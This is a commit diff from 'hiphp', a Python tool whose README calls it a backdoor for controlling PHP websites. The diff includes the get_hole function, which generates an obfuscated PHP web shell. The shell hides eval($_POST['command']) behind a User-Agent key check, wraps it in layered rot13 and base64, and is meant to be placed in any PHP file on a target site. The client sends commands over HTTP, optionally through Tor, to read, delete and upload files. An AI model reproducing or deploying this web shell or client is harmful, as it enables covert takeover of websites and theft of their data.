STRLCPY/hiphp

■ ■ ■ ■ ■ ■

CHANGELOG

	1	+	## 0.2.20 [10-08-2022]
	2	+	- Change the display of files in the command "--ls"
	3	+	- Fix "HIPHP_HOLE_CODE".
	4	+	- Add "--cls" to clear console.
	5	+	- Slight change to the command line interface logo.
	6	+	- Bug fixes & performance improvements.
	7	+
	8	+	## 0.2.19 [30-07-2022]
	9	+	- Preparing for the new version.
	10	+	- Rework the software rights with the addition of the Bitcoin wallet address.
	11	+	- new logo design.
	12	+	- Bug fixes & performance improvements.
	13	+
	14	+	## 0.2.18 [06-07-2022]
	15	+	- Bug fixes & performance improvements.
	16	+
1	17		## 0.2.17 [03-07-2022]
2	18		- Bug fixes on windows os.
3	19
		skipped 68 lines

■ ■ ■ ■ ■ ■

LICENSE

		skipped 22 lines
23	23		LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
24	24		OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
25	25		SOFTWARE.
26		-

■ ■ ■ ■ ■ ■

README.md

1	1		<img align="right" height="250" src="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/install/hiphp.png" alt="hiphp by yasserbdj96">
2	2		<h1>hiphp for control php websites.</h1>
3		-	<p>hiphp is BackDoor to control php-based sites hiphp can be controlled by sending commands, files, and tokens to the site using the http/https protocol. After copying the hiphp_hole_code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this back door is password protected.</p>
	3	+	<p>hiphp is BackDoor to control php-based sites hiphp can be controlled by sending commands, files, and tokens to the site using the http/https protocol. After copying the HIPHP_HOLE_CODE and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this back door is password protected.</p>
4	4
5	5		[![Python package](https://github.com/yasserbdj96/hiphp/actions/workflows/python-app.yml/badge.svg?branch=main)](https://github.com/yasserbdj96/hiphp/actions/workflows/python-app.yml) [![Docker image](https://github.com/yasserbdj96/hiphp/actions/workflows/docker-image.yml/badge.svg)](https://github.com/yasserbdj96/hiphp/actions/workflows/docker-image.yml) [![CodeFactor](https://www.codefactor.io/repository/github/yasserbdj96/hiphp/badge)](https://www.codefactor.io/repository/github/yasserbdj96/hiphp) [![Visitors](https://visitor-badge.laobi.icu/badge?page_id=yasserbdj96.hiphp)](https://github.com/yasserbdj96/hiphp)
	6	+
	7	+	<h2>You can use this version of the project as:</h2>
	8	+	[✓] Command line interface CLI.
	9	+	[✓] Graphical user interface GUI (beta).
	10	+	[✓] Python Module.
	11	+	[✓] Script.
	12	+	[✓] Container.
6	13
7	14		<h2>Languages:</h2>
8	15		* python3<br>
		skipped 43 lines
52	59		<h2>Python Package Installation:</h2>
53	60
54	61		```
	62	+	# install from pypi:
55	63		pip install hiphp
	64	+
	65	+	# local install:
	66	+	git clone https://github.com/yasserbdj96/hiphp.git
	67	+	cd hiphp
	68	+	sudo python setup.py install
56	69		```
57	70
58	71		<h2>Ubuntu Installation:</h2>
59	72
60	73		```
61	74		git clone https://github.com/yasserbdj96/hiphp.git
62		-	pip install -r ./hiphp/requirements.txt
63		-	cd ./hiphp/install/
64		-	chmod +x ./install.sh
65		-	sudo bash ./install.sh -i
	75	+	pip install -r hiphp/requirements.txt
	76	+	bash hiphp/install/install.sh -i
66	77		hiphp
67	78		```
68	79
		skipped 6 lines
75	86		python3 run.py <KEY> <URL>
76	87		```
77	88
78		-	<h2>Usage:</h2>
	89	+	<h2>Script Usage:</h2>
79	90
80	91		```python
81	92		from hiphp import *
		skipped 2 lines
84	95		p1=hiphp(key="<KEY>",url="<URL>")
85	96		```
86	97
87		-	<h2>Examples:</h2>
	98	+	<h2>Script Examples:</h2>
88	99
89	100		```python
90	101		#START{
		skipped 33 lines
124	135		<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot.png">
125	136		<img height="100" src="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot.png" alt="hiphp by yasserbdj96">
126	137		</a>
	138	+	<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot0.png">
	139	+	<img height="100" src="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot0.png" alt="hiphp by yasserbdj96">
	140	+	</a>
127	141		<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot1.png">
128	142		<img height="100" src="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot1.png" alt="hiphp by yasserbdj96">
129	143		</a>
		skipped 14 lines
144	158		<h2>Changelog History:</h2>
145	159
146	160		```
	161	+	## 0.2.20 [10-08-2022]
	162	+	- Change the display of files in the command "--ls"
	163	+	- Fix "HIPHP_HOLE_CODE".
	164	+	- Add "--cls" to clear console.
	165	+	- Slight change to the command line interface logo.
	166	+	- Bug fixes & performance improvements.
	167	+
147	168		## 0.2.19 [30-07-2022]
148	169		- Preparing for the new version.
149	170		- Rework the software rights with the addition of the Bitcoin wallet address.
		skipped 88 lines
238	259		<div align="center">
239	260		<a href="http://yasserbdj96.github.io/">Go to this link to get more information.</a>
240	261		</div>
241		-

■ ■ ■ ■ ■ ■

examples/get_info.php

		skipped 18 lines
19	19		echo "\n";
20	20		echo "Server Name : ".$_SERVER['HTTP_HOST'];
21	21		echo "\n";
	22	+	echo "Request_Method : ".$_SERVER['REQUEST_METHOD'];
	23	+	echo "\n";
22	24		echo "Admin Server : ".$_SERVER['SERVER_ADMIN'];
23	25		echo "\n";
24	26		echo "Server port : ".htmlentities($_SERVER['SERVER_PORT'], ENT_QUOTES, 'UTF-8');
		skipped 22 lines

■ ■ ■ ■ ■ ■

examples/phpinfo.php

		skipped 10 lines
11	11		# \| \|
12	12
13	13		#START{
14		-	// variables check:
15		-	echo phpinfo();
	14	+	phpinfo();
16	15		#}END.
17	16		?>

■ ■ ■ ■ ■ ■

hiphp/__init__.py

		skipped 15 lines
16	16		from hiphp.hiphpphpfunctions import *
17	17		from hiphp.hiphphelp import help
18	18		from hiphp.hiphpmsgs import *
	19	+	from hiphp.hiphplicense import license
	20	+	from hiphp.hiphpabout import about
19	21		from ashar import *
20	22		from hexor import *
21	23		from asciitext import *
		skipped 2 lines
24	26		import ast
25	27		#import readline
26	28		from os.path import exists
	29	+	from biglibrary import *
27	30
28	31		#start hiphp class:
29	32		class hiphp:
		skipped 27 lines
57	60		logo=""
58	61		if self.do_x==0:
59	62		spas=" "*5
	63	+	code_by=self.color.c("Code by -> ",self.c_yellow)+self.color.c("yasserbdj96",self.c_green)
60	64		logo+=self.color.c(f"""
61	65		{spas} ▄███████▄ ▄█ █▄ ▄███████▄
62	66		{spas} ███ ███ ███ ███ ███ ███
63	67		{spas}╦ ╦ ███ ███ ███ ███ ███ ███
64	68		{spas}║ ║ ═╦═ ▀█████████▀ ▀▀███▀▀▀▀███▀ ▀█████████▀
65	69		{spas}╠═══╣ ║ ███ ███ ███ ███
66		-	{spas}║ ║ ║ ███ ███ ███ ███
67		-	{spas}╩ ╩ ═╩═ ▄████▀ ███ █▀ ▄████▀ V0.2.19\n""",self.c_red)
68		-	logo+=self.color.c(" "*37+"Code by -> ",self.c_yellow)+self.color.c("yasserbdj96\n",self.c_green)
69		-	logo+=self.color.c("\n - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.\n",self.c_blue)
70		-	logo+=self.color.c(" - If you are having difficulties controlling the program, you can type '--help' for more informations.\n",self.c_yellow)
	70	+	{spas}║ ║ ║ ███ V0.2.20 ███ ███ ███
	71	+	{spas}╩ ╩ ═╩═ ▄████▀ ███ █▀ ▄████▀ {code_by}\n""",self.c_red)
	72	+	logo+=self.color.c(" "*17+"https://github.com/yasserbdj96\n",self.c_blue)
	73	+	#logo+=self.color.c(" "*37+"Code by -> ",self.c_yellow)+self.color.c("yasserbdj96\n",self.c_green)
	74	+	#logo+=self.color.c("\n - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.\n",self.c_blue)
	75	+	logo+=self.color.c("\n - '--help' for more informations.\n",self.c_yellow)
71	76		logo+=self.color.c(" - '--exit' OR 'Ctrl+C' for exit :)\n\n",self.c_yellow)
72	77		self.do_x+=1
73	78		#
		skipped 24 lines
98	103		#exit
99	104		elif command[0:6]=="--exit":
100	105		exit()
	106	+	#license
	107	+	elif command[0:9]=="--license":
	108	+	print(license())
	109	+	#about
	110	+	elif command[0:7]=="--about":
	111	+	print(about())
101	112		#ls
102	113		elif command[0:4]=="--ls":
103	114		if len(command)==4:
		skipped 7 lines
111	122		command=scandir(dirx)
112	123		sd=hiphp.do(self,self.key,self.url,self.headers,True,command)
113	124		x=ast.literal_eval(sd)
	125	+
	126	+
114	127		for i in range(len(x)):
115	128		if x[i]!="." and x[i]!="..":
116		-	print(x[i].replace("\/","/"))
	129	+	x[i]=x[i].replace("\/","/")
	130	+
	131	+	biglibrary().lslist(x,separator=" \| ")
117	132		#set
118	133		elif command[0:5]=="--set":
119	134		self.set+=command[6:]
120	135		#delete set
121	136		elif command[0:6]=="--dset":
122	137		self.set=""
	138	+	#clear
	139	+	elif command[0:5]=="--cls":
	140	+	os.system('cls' if os.name == 'nt' else 'clear')
123	141		#Get the hole Code
124		-	elif command[0:6]=="--geth":
125		-	hiphp.get_hole(self)
	142	+	elif command[0:6]=="--geth" or command[0:15]=="HIPHP_HOLE_CODE":
	143	+	hiphp.get_hole(self,get=True)
126	144		#cat
127	145		elif command[0:5]=="--cat":
128	146		dirx=command[6:]
		skipped 5 lines
134	152
135	153		if varss[len(varss)-1]=="":
136	154		del varss[len(varss)-1]
137		-	hiphp.run_file(self,varss[1],varss[2:])
	155	+	print(hiphp.run_file(self,varss[1],varss[2:]))
138	156		#up
139	157		elif command[0:4]=="--up":
140	158		try:
		skipped 13 lines
154	172		def do(self,key,url,header,retu,command):
155	173		regex = re.compile(r"^https?\:\/\/[\w\-\.]+\.onion")
156	174		proxies = {'http': 'socks5h://127.0.0.1:9150','https': 'socks5h://127.0.0.1:9150'}
157		-	if regex.match(url):
158		-	#.onion
159		-	response=requests.post(url,headers=header,proxies=proxies)
160		-	else:
161		-	response=requests.post(url,headers=header)
162		-	#response=requests.post(url,headers=header)
163		-	#
164		-	if response.status_code==200:
165		-	key_len=len(key)+1
166		-	# if the key are true:
167		-	if response.text[0:key_len]=="#"+key:
168		-	ploads={'command':self.set+command}
169		-	if ".onion" in url:
170		-	response=requests.post(url,headers=header,data=ploads,proxies=proxies)
171		-	else:
172		-	response=requests.post(url,headers=header,data=ploads)
173		-	response_text=response.text[key_len:]
174		-	if retu==True:
175		-	return response_text
176		-	else:
177		-	if len(response_text)!=0:
178		-	print(response_text)
	175	+
	176	+	try:
	177	+	if regex.match(url):
	178	+	#.onion
	179	+	response=requests.post(url,headers=header,proxies=proxies)
179	180		else:
180		-	if retu==True:
181		-	return emsg_1
	181	+	response=requests.post(url,headers=header)
	182	+	#response=requests.post(url,headers=header)
	183	+	#
	184	+	if response.status_code==200:
	185	+	key_len=len(key)+1
	186	+	# if the key are true:
	187	+	if response.text[0:key_len]=="#"+key:
	188	+	ploads={'command':self.set+command}
	189	+	if ".onion" in url:
	190	+	response=requests.post(url,headers=header,data=ploads,proxies=proxies)
	191	+	else:
	192	+	response=requests.post(url,headers=header,data=ploads)
	193	+	response_text=response.text[key_len:]
	194	+	if retu==True:
	195	+	return response_text
	196	+	else:
	197	+	if len(response_text)!=0:
	198	+	print(response_text)
182	199		else:
183		-	hexor().c(emsg_1,self.c_red)
184		-	exit()
185		-	else:
	200	+	if retu==True:
	201	+	return emsg_1
	202	+	else:
	203	+	hexor().c(emsg_1,self.c_red)
	204	+	exit()
	205	+	except:
186	206		hexor().c(emsg_3+" '"+url+"'.",self.c_red)
187	207		exit()
188	208
		skipped 1 lines
190	210		def run_file(self,file_path,*opts):
191	211		if exists(file_path):
192	212		open_file=open(file_path).read()
	213	+
193	214		if open_file[0:5]=="<?php":
194	215		open_file=open_file[6:]
195	216		if open_file[len(open_file)-2:len(open_file)]=="?>":
		skipped 36 lines
232	253		self.color2.c(f"{emsg_5} '{path_to_upluad}'.",self.c_red)
233	254
234	255		#get the hole:
235		-	def get_hole(self):
	256	+	def get_hole(self,get=False):
236	257		code="if($_SERVER['HTTP_USER_AGENT']=='"+self.key+"'){echo'#"+self.key+"';if(isset($_POST['command'])){eval($_POST['command']);}exit;}"
237	258		code=rot13(tobase64(rot13(tobase64(rot13(code)))))
238	259		code=f"eval(str_rot13(base64_decode(str_rot13(base64_decode(str_rot13('{code}'))))));"
239	260		php_s="/php code start/"
240	261		php_e="/php code end/"
241		-	if self.retu==True:
	262	+
	263	+	if self.retu==True and get==False:
242	264		return php_s+"\n"+code+"\n"+php_e
243	265		else:
244		-	self.color2.c(msg_1,self.c_yellow)
245		-	self.color2.c(php_s,self.c_red)
246		-	self.color2.c(code,self.c_green)
247		-	self.color2.c(php_e,self.c_red)
	266	+	geth=self.color.c(msg_1+"\n",self.c_yellow)
	267	+	geth+=self.color.c(php_s+"\n",self.c_red)
	268	+	geth+=self.color.c(code+"\n",self.c_green)
	269	+	geth+=self.color.c(php_e,self.c_red)
	270	+	print(geth)
248	271		#}END.
249	272

■ ■ ■ ■ ■ ■

hiphp/hiphpabout.py

1	+	def about():
2	+	about="""soon"""
3	+
4	+	return about

■ ■ ■ ■ ■ ■

hiphp/hiphphelp.py

		skipped 20 lines
21	21		[OPTIONS]
22	22		--help \| # Display this help.
23	23		--exit \| # Exit this console.
24		-	--geth \| # Get the hole Code.
	24	+	--geth \| # Get the hole Code, "HIPHP_HOLE_CODE" It has the same purpose.
	25	+	--cls \| # Clear console.
	26	+
25	27		[ACTIONS]
26	28		--ls \| # List information about the FILEs (the current directory by default).
27	29		Usage: --ls [OPTION] [PATH]
		skipped 21 lines
49	51		Mandatory arguments to long options:
50	52		--up [FILE_PATH] \| # Upload a file to the current directory.
51	53		--up [FILE_PATH] [PATH] \| # Upload a file to a specified directory.
52		-	[DEBUG]
53		-	None"""
	54	+
	55	+	[ABOUT]
	56	+	--license \| # This project license.
	57	+	--about \| # About this project."""
54	58		return help_text
55	59		#}END.
56	60

■ ■ ■ ■ ■ ■

hiphp/hiphplicense.py

1	+	def license():
2	+	license="""MIT License
3	+
4	+	Copyright © 2008->Present, yasserbdj96 (Boudjada Yasser).
5	+
6	+	Permission is hereby granted, free of charge, to any person obtaining a copy
7	+	of this software and associated documentation files (the "Software"), to deal
8	+	in the Software without restriction, including without limitation the rights
9	+	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
10	+	copies of the Software, and to permit persons to whom the Software is
11	+	furnished to do so, subject to the following conditions:
12	+
13	+	The above copyright notice and this permission notice shall be included in all
14	+	copies or substantial portions of the Software.
15	+
16	+	You also agree that if you become very rich with my projects, you will give me 1% of your fortune.
17	+
18	+	I AM NOT RESPONSIBLE HOW YOU USE MY TOOLS/PROGRAMS/PROJECTS. BE LEGAL AND NOT STUPID.
19	+
20	+	THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
21	+	IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
22	+	FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
23	+	AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
24	+	LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
25	+	OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
26	+	SOFTWARE."""
27	+	return license

install/hiphp.png

screenshot/screenshot.png

screenshot/screenshot0.png

screenshot/screenshot1.png

screenshot/screenshot2.png

scripts/hiphp_desktop/screenshot/screenshot.png

scripts/hiphp_desktop/screenshot/screenshot1.png

scripts/hiphp_desktop/src/hiphp_logo.png

scripts/hiphp_ftp/screenshot/screenshot.png

■ ■ ■ ■ ■ ■

setup.py

		skipped 14 lines
15	15		from setuptools import setup,find_packages
16	16		setup(
17	17		name="hiphp",
18		-	version="0.2.19",
	18	+	version="0.2.20",
19	19		author="yasserbdj96",
20	20		author_email="[email protected]",
21		-	description='''hiphp is BackDoor to control php-based sites hiphp can be controlled by sending commands, files, and tokens to the site using the http/https protocol. After copying the hiphp_hole_code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this back door is password protected.''',
	21	+	description='''hiphp is BackDoor to control php-based sites hiphp can be controlled by sending commands, files, and tokens to the site using the http/https protocol. After copying the code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this back door is password protected.''',
22	22		long_description_content_type="text/markdown",
23	23		long_description=open('README.md','r').read(),
24	24		license='''MIT License''',
		skipped 20 lines
45	45		python_requires=">=3.x.x"
46	46		)
47	47		#}END.
48		-

■ ■ ■ ■ ■ ■

version.txt

1		-	0.2.19
	1	+	0.2.20
2	2

0.2.20